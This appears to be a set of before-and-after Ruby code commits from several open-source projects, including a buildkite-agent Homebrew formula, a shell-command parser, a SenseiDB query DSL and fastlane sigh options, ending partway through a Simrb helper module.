desc "Build runner for use with Buildkite"
homepage "https://buildkite.com/docs/agent"
stable do
version "3.22.0"
url "https://github.com/buildkite/agent/releases/download/v3.22.0/buildkite-agent-darwin-amd64-3.22.0.tar.gz"
sha256 "cef4b13cee84119ea2a4853fb161e967de02a9c63f67ea3c1c4d1cd514e5059e"
end
option "token=", "Your account's agent token to add to the config on install"
def default_agent_token
"xxx"
end
def agent_token
ARGV.value("token") || default_agent_token
end
def agent_etc
etc/"buildkite-agent"
end
def agent_var
var/"buildkite-agent"
end
def agent_hooks_path
agent_etc/"hooks"
end
def agent_builds_path
agent_var/"builds"
end
def agent_plugins_path
agent_var/"plugins"
end
def agent_bootstrap_path
if stable?
agent_etc/"bootstrap.sh"
else
opt_bin/"buildkite-agent bootstrap"
end
end
def agent_config_path
agent_etc/"buildkite-agent.cfg"
end
def agent_config_dist_path
pkgshare/"buildkite-agent.dist.cfg"
end
def install
agent_etc.mkpath
agent_var.mkpath
pkgshare.mkpath
agent_hooks_path.mkpath
agent_builds_path.mkpath
agent_hooks_path.install Dir["hooks/*"]
if stable?
agent_etc.install "bootstrap.sh"
end
agent_config_dist_path.write(default_config_file)
if agent_config_path.exist?
puts "\033[35mIgnoring existing config file at #{agent_config_path}\033[0m"
puts "\033[35mFor changes see the updated dist copy at #{agent_config_dist_path}\033[0m"
else
agent_config_path.write(default_config_file(agent_token))
end
bin.install "buildkite-agent"
end
def default_config_file(agent_token = default_agent_token)
File.read("buildkite-agent.cfg")
.gsub(/token=.+/, "token=\"#{agent_token}\"")
.gsub(/bootstrap-script=.+/, "bootstrap-script=\"#{agent_bootstrap_path}\"")
.gsub(/build-path=.+/, "build-path=\"#{agent_builds_path}\"")
.gsub(/hooks-path=.+/, "hooks-path=\"#{agent_hooks_path}\"")
.gsub(/plugins-path=.+/, "plugins-path=\"#{agent_plugins_path}\"")
end
def caveats
<<~EOS
\033[32mbuildkite-agent is now installed!\033[0m#{agent_token_reminder}
Configuration file (to configure agent meta-data, priority, name, etc):
#{agent_config_path}
Hooks directory (for customising the agent):
#{agent_hooks_path}
Builds directory:
#{agent_builds_path}
Log paths:
#{var}/log/buildkite-agent.log
#{var}/log/buildkite-agent.error.log
If you set up the LaunchAgent, set your machine to auto-login as
your current user. It's also recommended to install Caffeine
(http://lightheadsw.com/caffeine/) to prevent your machine from going to
sleep or logging out.
To run multiple agents simply run the buildkite-agent start command
multiple times, or duplicate the LaunchAgent plist to create another
that starts on login.
EOS
end
plist_options :manual => "buildkite-agent start"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>WorkingDirectory</key>
<string>#{HOMEBREW_PREFIX}/bin</string>
<key>ProgramArguments</key>
<array>
<string>#{HOMEBREW_PREFIX}/bin/buildkite-agent</string>
<string>start</string>
<string>--config</string>
<string>#{agent_config_path}</string>
<!--<string>--debug</string>-->
</array>
<key>EnvironmentVariables</key>
<dict>
<key>PATH</key>
<string>#{HOMEBREW_PREFIX}/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
</dict>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>ProcessType</key>
<string>Interactive</string>
<key>ThrottleInterval</key>
<integer>30</integer>
<key>StandardOutPath</key>
<string>#{var}/log/buildkite-agent.log</string>
<key>StandardErrorPath</key>
<string>#{var}/log/buildkite-agent.log</string>
</dict>
</plist>
EOS
end
def agent_token_reminder
return "" unless agent_config_path.exist?
if agent_config_path.read.include?(default_agent_token)
"\n \n \033[31mDon't forget to update your configuration file with your agent token\033[0m"
end
end
test do
system "#{bin}/buildkite-agent", "--help"
end
end
fix(ARGV): Homebrew v2.3.0 EOLd various ARGV APIs
Related Links:
- https://github.com/buildkite/homebrew-buildkite/issues/15
- https://github.com/Homebrew/brew/pull/7538
- https://github.com/Homebrew/brew/releases/tag/2.3.0
---
class BuildkiteAgent < Formula
desc "Build runner for use with Buildkite"
homepage "https://buildkite.com/docs/agent"
stable do
version "3.22.0"
url "https://github.com/buildkite/agent/releases/download/v3.22.0/buildkite-agent-darwin-amd64-3.22.0.tar.gz"
sha256 "cef4b13cee84119ea2a4853fb161e967de02a9c63f67ea3c1c4d1cd514e5059e"
end
option "token=", "Your account's agent token to add to the config on install"
def default_agent_token
"xxx"
end
def agent_token
Homebrew.args.value("token") || default_agent_token
end
def agent_etc
etc/"buildkite-agent"
end
def agent_var
var/"buildkite-agent"
end
def agent_hooks_path
agent_etc/"hooks"
end
def agent_builds_path
agent_var/"builds"
end
def agent_plugins_path
agent_var/"plugins"
end
def agent_bootstrap_path
if stable?
agent_etc/"bootstrap.sh"
else
opt_bin/"buildkite-agent bootstrap"
end
end
def agent_config_path
agent_etc/"buildkite-agent.cfg"
end
def agent_config_dist_path
pkgshare/"buildkite-agent.dist.cfg"
end
def install
agent_etc.mkpath
agent_var.mkpath
pkgshare.mkpath
agent_hooks_path.mkpath
agent_builds_path.mkpath
agent_hooks_path.install Dir["hooks/*"]
if stable?
agent_etc.install "bootstrap.sh"
end
agent_config_dist_path.write(default_config_file)
if agent_config_path.exist?
puts "\033[35mIgnoring existing config file at #{agent_config_path}\033[0m"
puts "\033[35mFor changes see the updated dist copy at #{agent_config_dist_path}\033[0m"
else
agent_config_path.write(default_config_file(agent_token))
end
bin.install "buildkite-agent"
end
def default_config_file(agent_token = default_agent_token)
File.read("buildkite-agent.cfg")
.gsub(/token=.+/, "token=\"#{agent_token}\"")
.gsub(/bootstrap-script=.+/, "bootstrap-script=\"#{agent_bootstrap_path}\"")
.gsub(/build-path=.+/, "build-path=\"#{agent_builds_path}\"")
.gsub(/hooks-path=.+/, "hooks-path=\"#{agent_hooks_path}\"")
.gsub(/plugins-path=.+/, "plugins-path=\"#{agent_plugins_path}\"")
end
def caveats
<<~EOS
\033[32mbuildkite-agent is now installed!\033[0m#{agent_token_reminder}
Configuration file (to configure agent meta-data, priority, name, etc):
#{agent_config_path}
Hooks directory (for customising the agent):
#{agent_hooks_path}
Builds directory:
#{agent_builds_path}
Log paths:
#{var}/log/buildkite-agent.log
#{var}/log/buildkite-agent.error.log
If you set up the LaunchAgent, set your machine to auto-login as
your current user. It's also recommended to install Caffeine
(http://lightheadsw.com/caffeine/) to prevent your machine from going to
sleep or logging out.
To run multiple agents simply run the buildkite-agent start command
multiple times, or duplicate the LaunchAgent plist to create another
that starts on login.
EOS
end
plist_options :manual => "buildkite-agent start"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>WorkingDirectory</key>
<string>#{HOMEBREW_PREFIX}/bin</string>
<key>ProgramArguments</key>
<array>
<string>#{HOMEBREW_PREFIX}/bin/buildkite-agent</string>
<string>start</string>
<string>--config</string>
<string>#{agent_config_path}</string>
<!--<string>--debug</string>-->
</array>
<key>EnvironmentVariables</key>
<dict>
<key>PATH</key>
<string>#{HOMEBREW_PREFIX}/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
</dict>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>ProcessType</key>
<string>Interactive</string>
<key>ThrottleInterval</key>
<integer>30</integer>
<key>StandardOutPath</key>
<string>#{var}/log/buildkite-agent.log</string>
<key>StandardErrorPath</key>
<string>#{var}/log/buildkite-agent.log</string>
</dict>
</plist>
EOS
end
def agent_token_reminder
return "" unless agent_config_path.exist?
if agent_config_path.read.include?(default_agent_token)
"\n \n \033[31mDon't forget to update your configuration file with your agent token\033[0m"
end
end
test do
system "#{bin}/buildkite-agent", "--help"
end
end
|
# -*- coding: utf-8 -*-
module RunSh
module SyntaxStructString
refine String do
def to_cmd_field(cmd_intp, context)
self
end
end
end
end
using RunSh::SyntaxStructString
module RunSh
module SyntaxStruct
class CommandList
def initialize(eoc: nil)
@fields = []
@eoc = eoc
end
attr_reader :fields
attr_accessor :eoc
def ==(other)
if (other.is_a? CommandList) then
@fields == other.fields && @eoc == other.eoc
end
end
def empty?
@fields.empty?
end
def add(field_list)
@fields << field_list
self
end
def strip!
while (! @fields.empty? && @fields.last.empty?)
@fields.pop
end
self
end
def to_cmd_exec_list(cmd_intp, context)
@fields.map{|field_list|
field_list.to_cmd_field(cmd_intp, context)
}
end
end
class FieldList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? FieldList) then
@values == other.values
end
end
def empty?
@values.empty?
end
def add(value)
@values << value
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
class QuotedString
def initialize
@string = ''
end
attr_reader :string
def ==(other)
if (other.is_a? QuotedString) then
@string == other.string
end
end
def add(string)
@string << string
self
end
def to_cmd_field(cmd_intp, context)
@string
end
end
class DoubleQuotedList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? DoubleQuotedList) then
@values == other.values
end
end
def add(value)
if ((value.is_a? String) &&
(@values.length > 0) && (@values.last.is_a? String))
then
@values.last << value
else
@values << value
end
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
end
class CommandParser
include SyntaxStruct
def initialize(token_src)
@token_src = token_src
@cmd_nest = 0
end
def parsing_command?
@cmd_nest >= 1
end
def each_token
begin
loop do
token_name, token_value = @token_src.next
yield(token_name, token_value)
end
rescue StopIteration
# end of loop
end
end
private :each_token
def parse_command
@cmd_nest += 1
begin
cmd_list = CommandList.new
field_list = FieldList.new
cmd_list.add(field_list)
each_token do |token_name, token_value|
case (token_name)
when :space
unless (field_list.empty?) then
field_list = FieldList.new
cmd_list.add(field_list)
end
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
field_list.add(QuotedString.new.add(escaped_char))
end
when :quote
field_list.add(parse_single_quote)
when :qquote
field_list.add(parse_double_quote)
when :cmd_sep, :cmd_term
cmd_list.eoc = token_value
return cmd_list.strip!
else
field_list.add(token_value)
end
end
cmd_list.strip!
cmd_list unless cmd_list.empty?
ensure
@cmd_nest -= 1
end
end
def parse_single_quote
qs = QuotedString.new
each_token do |token_name, token_value|
case (token_name)
when :quote
return qs
else
qs.add(token_value)
end
end
raise "syntax error: not terminated single-quoted string: #{qs.string}"
end
def parse_double_quote
qq_list = DoubleQuotedList.new
each_token do |token_name, token_value|
case (token_name)
when :qquote
return qq_list
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
qq_list.add(escaped_char)
end
else
qq_list.add(token_value)
end
end
raise "syntax error: not terminated double-quoted string: #{qq_list.values}"
end
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
command parser syntax. anonymous refine.
# -*- coding: utf-8 -*-
module RunSh
module SyntaxStruct
using Module.new{
refine String do
def to_cmd_field(cmd_intp, context)
self
end
end
}
class CommandList
def initialize(eoc: nil)
@fields = []
@eoc = eoc
end
attr_reader :fields
attr_accessor :eoc
def ==(other)
if (other.is_a? CommandList) then
@fields == other.fields && @eoc == other.eoc
end
end
def empty?
@fields.empty?
end
def add(field_list)
@fields << field_list
self
end
def strip!
while (! @fields.empty? && @fields.last.empty?)
@fields.pop
end
self
end
def to_cmd_exec_list(cmd_intp, context)
@fields.map{|field_list|
field_list.to_cmd_field(cmd_intp, context)
}
end
end
class FieldList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? FieldList) then
@values == other.values
end
end
def empty?
@values.empty?
end
def add(value)
@values << value
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
class QuotedString
def initialize
@string = ''
end
attr_reader :string
def ==(other)
if (other.is_a? QuotedString) then
@string == other.string
end
end
def add(string)
@string << string
self
end
def to_cmd_field(cmd_intp, context)
@string
end
end
class DoubleQuotedList
def initialize
@values = []
end
attr_reader :values
def ==(other)
if (other.is_a? DoubleQuotedList) then
@values == other.values
end
end
def add(value)
if ((value.is_a? String) &&
(@values.length > 0) && (@values.last.is_a? String))
then
@values.last << value
else
@values << value
end
self
end
def to_cmd_field(cmd_intp, context)
@values.map{|field_value|
field_value.to_cmd_field(cmd_intp, context)
}.join('')
end
end
end
class CommandParser
include SyntaxStruct
def initialize(token_src)
@token_src = token_src
@cmd_nest = 0
end
def parsing_command?
@cmd_nest >= 1
end
def each_token
begin
loop do
token_name, token_value = @token_src.next
yield(token_name, token_value)
end
rescue StopIteration
# end of loop
end
end
private :each_token
def parse_command
@cmd_nest += 1
begin
cmd_list = CommandList.new
field_list = FieldList.new
cmd_list.add(field_list)
each_token do |token_name, token_value|
case (token_name)
when :space
unless (field_list.empty?) then
field_list = FieldList.new
cmd_list.add(field_list)
end
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
field_list.add(QuotedString.new.add(escaped_char))
end
when :quote
field_list.add(parse_single_quote)
when :qquote
field_list.add(parse_double_quote)
when :cmd_sep, :cmd_term
cmd_list.eoc = token_value
return cmd_list.strip!
else
field_list.add(token_value)
end
end
cmd_list.strip!
cmd_list unless cmd_list.empty?
ensure
@cmd_nest -= 1
end
end
def parse_single_quote
qs = QuotedString.new
each_token do |token_name, token_value|
case (token_name)
when :quote
return qs
else
qs.add(token_value)
end
end
raise "syntax error: not terminated single-quoted string: #{qs.string}"
end
def parse_double_quote
qq_list = DoubleQuotedList.new
each_token do |token_name, token_value|
case (token_name)
when :qquote
return qq_list
when :escape
escaped_char = token_value[1..-1]
if (escaped_char != "\n") then
qq_list.add(escaped_char)
end
else
qq_list.add(token_value)
end
end
raise "syntax error: not terminated double-quoted string: #{qq_list.values}"
end
end
end
# Local Variables:
# mode: Ruby
# indent-tabs-mode: nil
# End:
|
module S3io
VERSION = "1.1.2"
end
version bumped to 1.1.3
module S3io
VERSION = "1.1.3"
end
|
# Query DSL for SenseiDB
# The basic grammar is as follows:
# query := q(field => value) (produces a term query)
# / q(field => [values ...]) (produces a boolean query composed of
# the OR of {field => value} queries for each value)
# / q(field => (start..end)) (produces a range query on field between start and end)
# / query & query (ANDs two subqueries together)
# / query | query (ORs two subqueries together)
#
# value := something that should probably be a string, but might work if it isn't
#
# Note: use of the `q' operator must be performed within the context of
# a Sensei::Query.construct block, i.e.
# Sensei::Query.construct do
# (q(:foo => (15..30)) & q(:bar => '1')).boost!(10) | q(:baz => 'wiz')
# end
# If you're not in a construct block, you can still do Sensei::Query.q(...).
module Sensei
module Operators
def &(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :must)
end
def |(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :should)
end
def ~
self.must_not
end
def *(x)
self.boost!(x)
end
def must_not
BoolQuery.new(:operands => [self.to_sensei], :operation => :must_not)
end
def boost! amt
self.to_sensei.tap do |x| x.options[:boost] = amt end
end
end
class Query
attr_accessor :options
cattr_accessor :result_klass
include Operators
def initialize(opts={})
@options = opts
end
def get_boost
options[:boost] ? {:boost => options[:boost]} : {}
end
def to_sensei
self
end
def self.construct &block
class_eval(&block)
end
def self.q(h)
h.to_sensei
end
def not_query?
self.is_a?(Sensei::BoolQuery) && options[:operation] == :must_not
end
def run(options = {})
results = Sensei::Client.new(options.merge(:query => self)).search
if @@result_klass
@@result_klass.new(results)
else
results
end
end
end
class BoolQuery < Query
def operands
options[:operands]
end
def to_h
if self.not_query?
raise Exception, "Error: independent boolean NOT query not allowed."
end
not_queries, non_not_queries = operands.partition(&:not_query?)
not_queries = not_queries.map{|x| x.operands.map(&:to_h)}.flatten
non_not_queries = non_not_queries.reject{|x| x.is_a? AllQuery} if options[:operation] == :must
subqueries = non_not_queries.map(&:to_h)
mergeable, nonmergeable = subqueries.partition do |x|
isbool = x[:bool]
sameop = isbool && isbool[options[:operation]]
boosted = isbool && isbool[:boost]
isbool && sameop && (boosted.nil? || boosted == options[:boost])
end
merged_queries = mergeable.map{|x| x[:bool][options[:operation]]}.flatten(1)
merged_nots = mergeable.map{|x| x[:bool][:must_not] || []}.flatten(1)
all_nots = merged_nots + not_queries
not_clause = (all_nots.count > 0 ? {:must_not => all_nots} : {})
{:bool => {
options[:operation] => nonmergeable + merged_queries
}.merge(get_boost).merge(not_clause)
}
end
end
class TermQuery < Query
def to_h
{:term => {options[:field] => {:value => options[:value].to_s}.merge(get_boost)}}
end
end
class TermsQuery < Query
def to_h
{:terms => {options[:field] => {:values => options[:values].map(&:to_s)}.merge(get_boost)}}
end
end
class RangeQuery < Query
def to_h
{:range => {
options[:field] => {
:from => options[:from],
:to => options[:to],
:_type => options[:type] || ((options[:from].is_a?(Float) || options[:to].is_a?(Float)) ? "double" : "float")
}.merge(get_boost).merge(options[:type] == :date ? {:_date_format => options[:date_format] || 'YYYY-MM-DD'} : {})
},
}
end
end
class EmptyQuery < Query
def &(x)
x
end
def |(x)
x
end
def ~
raise 'Should not call on an empty query'
end
def *(x)
raise 'Should not call on an empty query'
end
def must_not
raise 'Should not call on an empty query'
end
def boost! amt
raise 'Should not call on an empty query'
end
def to_h
{}
end
end
class AllQuery < Query
def to_h
{:match_all => {}.merge(get_boost)}
end
end
class UIDQuery < Query
def initialize(uids)
uids = [uids] unless uids.is_a?(Array)
@uids = uids
end
def to_h
{:ids => {:values => @uids}}
end
end
end
class Hash
def to_sensei
field, value = self.first
if [String, Fixnum, Float, Bignum].member?(value.class)
Sensei::TermQuery.new(:field => field, :value => value)
else
value.to_sensei(field)
end
end
end
class Range
def to_sensei(field)
Sensei::RangeQuery.new(:from => self.begin, :to => self.end, :field => field)
end
end
class Array
def to_sensei(field, op=:should)
Sensei::BoolQuery.new(:operation => op, :operands => self.map{|value| {field => value}.to_sensei})
end
end
refactor array to_sensei method to use TermsQuery
# Query DSL for SenseiDB
# The basic grammar is as follows:
# query := q(field => value) (produces a term query)
# / q(field => [values ...]) (produces a boolean query composed of
# the OR of {field => value} queries for each value)
# / q(field => (start..end)) (produces a range query on field between start and end)
# / query & query (ANDs two subqueries together)
# / query | query (ORs two subqueries together)
#
# value := something that should probably be a string, but might work if it isn't
#
# Note: use of the `q' operator must be performed within the context of
# a Sensei::Query.construct block, i.e.
# Sensei::Query.construct do
# (q(:foo => (15..30)) & q(:bar => '1')).boost!(10) | q(:baz => 'wiz')
# end
# If you're not in a construct block, you can still do Sensei::Query.q(...).
module Sensei
module Operators
def &(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :must)
end
def |(x)
return self if self == x
return self if x.is_a? EmptyQuery
BoolQuery.new(:operands => [self.to_sensei, x.to_sensei], :operation => :should)
end
def ~
self.must_not
end
def *(x)
self.boost!(x)
end
def must_not
BoolQuery.new(:operands => [self.to_sensei], :operation => :must_not)
end
def boost! amt
self.to_sensei.tap do |x| x.options[:boost] = amt end
end
end
class Query
attr_accessor :options
cattr_accessor :result_klass
include Operators
def initialize(opts={})
@options = opts
end
def get_boost
options[:boost] ? {:boost => options[:boost]} : {}
end
def to_sensei
self
end
def self.construct &block
class_eval(&block)
end
def self.q(h)
h.to_sensei
end
def not_query?
self.is_a?(Sensei::BoolQuery) && options[:operation] == :must_not
end
def run(options = {})
results = Sensei::Client.new(options.merge(:query => self)).search
if @@result_klass
@@result_klass.new(results)
else
results
end
end
end
class BoolQuery < Query
def operands
options[:operands]
end
def to_h
if self.not_query?
raise Exception, "Error: independent boolean NOT query not allowed."
end
not_queries, non_not_queries = operands.partition(&:not_query?)
not_queries = not_queries.map{|x| x.operands.map(&:to_h)}.flatten
non_not_queries = non_not_queries.reject{|x| x.is_a? AllQuery} if options[:operation] == :must
subqueries = non_not_queries.map(&:to_h)
mergeable, nonmergeable = subqueries.partition do |x|
isbool = x[:bool]
sameop = isbool && isbool[options[:operation]]
boosted = isbool && isbool[:boost]
isbool && sameop && (boosted.nil? || boosted == options[:boost])
end
merged_queries = mergeable.map{|x| x[:bool][options[:operation]]}.flatten(1)
merged_nots = mergeable.map{|x| x[:bool][:must_not] || []}.flatten(1)
all_nots = merged_nots + not_queries
not_clause = (all_nots.count > 0 ? {:must_not => all_nots} : {})
{:bool => {
options[:operation] => nonmergeable + merged_queries
}.merge(get_boost).merge(not_clause)
}
end
end
class TermQuery < Query
def to_h
{:term => {options[:field] => {:value => options[:value].to_s}.merge(get_boost)}}
end
end
class TermsQuery < Query
def to_h
{:terms => {options[:field] => {:values => options[:values].map(&:to_s)}.merge(get_boost)}}
end
end
class RangeQuery < Query
def to_h
{:range => {
options[:field] => {
:from => options[:from],
:to => options[:to],
:_type => options[:type] || ((options[:from].is_a?(Float) || options[:to].is_a?(Float)) ? "double" : "float")
}.merge(get_boost).merge(options[:type] == :date ? {:_date_format => options[:date_format] || 'YYYY-MM-DD'} : {})
},
}
end
end
class EmptyQuery < Query
def &(x)
x
end
def |(x)
x
end
def ~
raise 'Should not call on an empty query'
end
def *(x)
raise 'Should not call on an empty query'
end
def must_not
raise 'Should not call on an empty query'
end
def boost! amt
raise 'Should not call on an empty query'
end
def to_h
{}
end
end
class AllQuery < Query
def to_h
{:match_all => {}.merge(get_boost)}
end
end
class UIDQuery < Query
def initialize(uids)
uids = [uids] unless uids.is_a?(Array)
@uids = uids
end
def to_h
{:ids => {:values => @uids}}
end
end
end
class Hash
def to_sensei
field, value = self.first
if [String, Fixnum, Float, Bignum].member?(value.class)
Sensei::TermQuery.new(:field => field, :value => value)
else
value.to_sensei(field)
end
end
end
class Range
def to_sensei(field)
Sensei::RangeQuery.new(:from => self.begin, :to => self.end, :field => field)
end
end
class Array
def to_sensei(field, op=:should)
if op == :should
Sensei::TermsQuery.new(:field => field, :values => self)
else
Sensei::BoolQuery.new(:operation => op, :operands => self.map{|value| {field => value}.to_sensei})
end
end
end
|
Add sentry-raven.rb to auto require raven (fixes GH-35)
require "raven" |
require 'fastlane_core'
module Sigh
class Options
def self.available_options
@@options ||= [
FastlaneCore::ConfigItem.new(key: :adhoc,
env_name: "SIGH_AD_HOC",
description: "Setting this flag will generate AdHoc profiles instead of App Store Profiles",
is_string: false),
FastlaneCore::ConfigItem.new(key: :skip_install,
env_name: "SIGH_SKIP_INSTALL",
description: "By default, the certificate will be added on your local machine. Setting this flag will skip this action",
is_string: false),
FastlaneCore::ConfigItem.new(key: :development,
env_name: "SIGH_DEVELOPMENT",
description: "Renew the development certificate instead of the production one",
is_string: false),
FastlaneCore::ConfigItem.new(key: :force,
env_name: "SIGH_FORCE",
description: "Renew non-development provisioning profiles regardless of its state",
is_string: false),
FastlaneCore::ConfigItem.new(key: :app_identifier,
short_option: "-a",
env_name: "SIGH_APP_IDENTIFIER",
description: "The bundle identifier of your app",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:app_identifier)),
FastlaneCore::ConfigItem.new(key: :username,
short_option: "-u",
env_name: "SIGH_USERNAME",
description: "Your Apple ID Username",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:apple_id),
verify_block: Proc.new do |value|
CredentialsManager::PasswordManager.shared_manager(value)
end),
FastlaneCore::ConfigItem.new(key: :provisioning_file_name,
short_option: "-n",
env_name: "SIGH_PROVISIONING_PROFILE_NAME",
description: "The name of the generated certificate file",
optional: true),
FastlaneCore::ConfigItem.new(key: :output_path,
short_option: "-o",
env_name: "SIGH_OUTPUT_PATH",
description: "Directory in which the profile should be stored",
default_value: ".",
verify_block: Proc.new do |value|
raise "Could not find output directory '#{value}'".red unless File.exists?(value)
end),
FastlaneCore::ConfigItem.new(key: :cert_id,
short_option: "-i",
env_name: "SIGH_CERTIFICATE_ID",
description: "The ID of the certificate to use",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_owner_name,
short_option: "-c",
env_name: "SIGH_CERTIFICATE",
description: "The certificate name to use for new profiles, or to renew with. (e.g. \"Felix Krause\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_date,
short_option: "-d",
env_name: "SIGH_CERTIFICATE_EXPIRE_DATE",
description: "The certificate with the given expiry date used to renew. (e.g. \"Nov 11, 2017\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :filename,
short_option: "-f",
env_name: "SIGH_PROFILE_FILE_NAME",
optional: true,
description: "Filename to use for the generated provisioning profile (must include .mobileprovision)",
verify_block: Proc.new do |value|
raise "The output name must end with .mobileprovision".red unless value.end_with?".mobileprovision"
end)
]
end
end
end
Added support for TEAM_ID using CLI
require 'fastlane_core'
module Sigh
class Options
def self.available_options
@@options ||= [
FastlaneCore::ConfigItem.new(key: :adhoc,
env_name: "SIGH_AD_HOC",
description: "Setting this flag will generate AdHoc profiles instead of App Store Profiles",
is_string: false),
FastlaneCore::ConfigItem.new(key: :skip_install,
env_name: "SIGH_SKIP_INSTALL",
description: "By default, the certificate will be added on your local machine. Setting this flag will skip this action",
is_string: false),
FastlaneCore::ConfigItem.new(key: :development,
env_name: "SIGH_DEVELOPMENT",
description: "Renew the development certificate instead of the production one",
is_string: false),
FastlaneCore::ConfigItem.new(key: :force,
env_name: "SIGH_FORCE",
description: "Renew non-development provisioning profiles regardless of its state",
is_string: false),
FastlaneCore::ConfigItem.new(key: :app_identifier,
short_option: "-a",
env_name: "SIGH_APP_IDENTIFIER",
description: "The bundle identifier of your app",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:app_identifier)),
FastlaneCore::ConfigItem.new(key: :username,
short_option: "-u",
env_name: "SIGH_USERNAME",
description: "Your Apple ID Username",
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:apple_id),
verify_block: Proc.new do |value|
CredentialsManager::PasswordManager.shared_manager(value)
end),
FastlaneCore::ConfigItem.new(key: :team_id,
short_option: "-t",
env_name: "SIGH_TEAM_ID",
description: "The ID of your team if you're in multiple teams",
optional: true,
verify_block: Proc.new do |value|
ENV["FASTLANE_TEAM_ID"] = value
end),
FastlaneCore::ConfigItem.new(key: :provisioning_file_name,
short_option: "-n",
env_name: "SIGH_PROVISIONING_PROFILE_NAME",
description: "The name of the generated certificate file",
optional: true),
FastlaneCore::ConfigItem.new(key: :output_path,
short_option: "-o",
env_name: "SIGH_OUTPUT_PATH",
description: "Directory in which the profile should be stored",
default_value: ".",
verify_block: Proc.new do |value|
raise "Could not find output directory '#{value}'".red unless File.exists?(value)
end),
FastlaneCore::ConfigItem.new(key: :cert_id,
short_option: "-i",
env_name: "SIGH_CERTIFICATE_ID",
description: "The ID of the certificate to use",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_owner_name,
short_option: "-c",
env_name: "SIGH_CERTIFICATE",
description: "The certificate name to use for new profiles, or to renew with. (e.g. \"Felix Krause\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :cert_date,
short_option: "-d",
env_name: "SIGH_CERTIFICATE_EXPIRE_DATE",
description: "The certificate with the given expiry date used to renew. (e.g. \"Nov 11, 2017\")",
optional: true),
FastlaneCore::ConfigItem.new(key: :filename,
short_option: "-f",
env_name: "SIGH_PROFILE_FILE_NAME",
optional: true,
description: "Filename to use for the generated provisioning profile (must include .mobileprovision)",
verify_block: Proc.new do |value|
raise "The output name must end with .mobileprovision".red unless value.end_with?".mobileprovision"
end)
]
end
end
end
|
Sroot = Dir.pwd + '/'
module Simrb
# common methods
class << self
def yaml_read path
require 'yaml'
YAML.load_file path
rescue
[]
end
def yaml_write path, data
require "yaml"
File.open(path, 'w+') do | f |
f.write data.to_yaml
end
end
def p args
res = ""
if args.class.to_s == 'Array'
res = args.join("\n")
elsif args.class.to_s == 'Hash'
args.each do | k, v |
res << "#{k.to_s.ljust(15)} => #{v}\n"
end
res = res.chomp "\n"
else
res = args.to_s
end
puts "="*30 + "\n" + res + "\n" + "="*30
end
def load_module
dirs = []
module_ds = {}
# get the path of module
if Scfg[:only_enable_modules].empty?
dirs = Dir["#{Spath[:module]}*"]
else
Scfg[:only_enable_modules].each do | name |
path = "#{Spath[:module]}#{name}"
dirs << path if File.exist?(path)
end
end
# load the info of module
dirs.each do | path |
path = "#{path}#{Spath[:modinfo]}"
content = Simrb.yaml_read path
name = content[0]["name"]
order = (content[0]["order"] || 99)
module_ds[name] = order unless Scfg[:disable_modules].include?(name.to_s)
end
# sort the module by order field
res = []
module_ds = module_ds.sort_by { |k, v| v }
module_ds.each do | item |
res << item[0]
end
res
end
def path_init path
unless File.exist?(path)
if path[-1] == '/'
Dir.mkdir(path)
else
File.open(path, 'w+') do | f |
f.write("")
end
end
end
end
def is_root_dir?
unless File.exist? 'scfg'
Simrb.p "Current command only allow to be used under root directory of project"
exit
end
end
# format the input argument from an array to two item,
# first item is orgin array, last is an hash option
#
# == Example
#
# args, opts = Simrb.format_input ["test", "test2", "--test", "--name=test2", "-n=test3"]
#
# the above is same as
#
# args, opts = Simrb.format_input ["--test", "test", "test2", "--name=test2", "-n=test3"]
#
# the options that starts with "-" you can write any positions of argument
#
# output
#
# args = ["test", "test2"]
# opts = {test: true, name: test2, n:test3}
#
def format_input args = []
resa = [] # return an array
resh = {} # return an hash
unless args.empty?
args.each do | item |
if item[0] == "-"
new_item = item.split("-").uniq.last
if new_item.index "="
key, val = new_item.split "="
resh[key.to_sym] = val
else
resh[new_item.to_sym] = true
end
else
resa << item
end
end
end
[resa, resh]
end
end
# basic path definition
Spath = {
# root path of project
